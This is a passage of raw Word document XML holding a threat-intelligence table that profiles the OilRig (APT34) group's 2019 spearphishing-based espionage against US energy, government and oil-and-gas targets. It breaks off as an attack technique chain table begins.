      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="17648AED" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A91300C" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EECEF3B" w14:textId="6A491ED2" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00063FEC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>OilRig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A2B772" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="6A9E01A5" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073258E7" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="007328DE" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31894F3D" w14:textId="0AED4881" w:rsidR="00063FEC" w:rsidRPr="007328DE" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r w:rsidR="00FB3722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FB3722" w:rsidRPr="00FB3722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00FB3722" w:rsidRPr="00FB3722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00FB3722" w:rsidRPr="00FB3722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB1AF46" w14:textId="0CCBCC6A" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00FB3722" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="2EF51F5C" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB20277" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A155BCF" w14:textId="7D6CACB3" w:rsidR="00063FEC" w:rsidRPr="007328DE" w:rsidRDefault="00261708" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Iran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106FE01B" w14:textId="52BEB668" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00261708" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="024A0FAB" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC0E511" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F206C14" w14:textId="6D140782" w:rsidR="00063FEC" w:rsidRDefault="00176F35" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79DF303A" w14:textId="5A552BCD" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00660FEA" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="1BCC474D" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E47CA7E" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53302688" w14:textId="0B0A396B" w:rsidR="00063FEC" w:rsidRDefault="00261708" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Oil and Gas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F02A4D1" w14:textId="334822C5" w:rsidR="00261708" w:rsidRPr="00261708" w:rsidRDefault="00261708" w:rsidP="00261708">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] P</w:t>
            </w:r>
            <w:r w:rsidRPr="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>rimarily targeting the following industries:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6379AA8F" w14:textId="77777777" w:rsidR="00261708" w:rsidRPr="00261708" w:rsidRDefault="00261708" w:rsidP="00261708">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Energy and Utilities</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D911879" w14:textId="77777777" w:rsidR="00261708" w:rsidRPr="00261708" w:rsidRDefault="00261708" w:rsidP="00261708">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79430964" w14:textId="5264C2B5" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00261708" w:rsidP="00261708">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Oil and Gas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="33D44E25" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D82620" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D3B423D" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5568E2DE" w14:textId="5F50EB49" w:rsidR="00063FEC" w:rsidRDefault="00660FEA" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00176F35">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Cyber Espionage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00660FEA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">APT34 </w:t>
            </w:r>
            <w:r w:rsidR="00C83BCE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">(AKA Oilrig) </w:t>
            </w:r>
            <w:r w:rsidRPr="00660FEA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="55099921" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C69FB4" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48E9BA6B" w14:textId="3CDE5D7F" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A188CA" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="6E4CB46C" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C446878" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1768A980" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253B482D" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="09F2DAD9" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB2776B" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9BF1CD" w14:textId="50F6F52F" w:rsidR="00063FEC" w:rsidRDefault="00FB3722" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15982C94" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="3943F482" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C26955" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714FCC0D" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D53F753" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="7B685ED4" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F07F265" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEAFE5B" w14:textId="09ED78DE" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidR="00261708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="482CD807" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="125"/>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="00B857D7" w14:paraId="338AB6CB" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0AE67F" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33397D2A" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8384CE" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B93490F" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="00AC7A85" w:rsidRDefault="00063FEC" w:rsidP="00063FEC"/>
    <w:p w14:paraId="0C66B0F3" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="00063FEC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10672" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="2260"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="555"/>
        <w:gridCol w:w="876"/>
        <w:gridCol w:w="4055"/>
      </w:tblGrid>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="002D1D50" w14:paraId="0BD5585C" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F0E5A" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="126" w:name="OLE_LINK15"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="22F675C1" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="64102588" w14:textId="1CDC3562" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00063FEC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>OilRig</w:t>
            </w:r>
            <w:r w:rsidR="00CD3EAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A7CC9FE" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
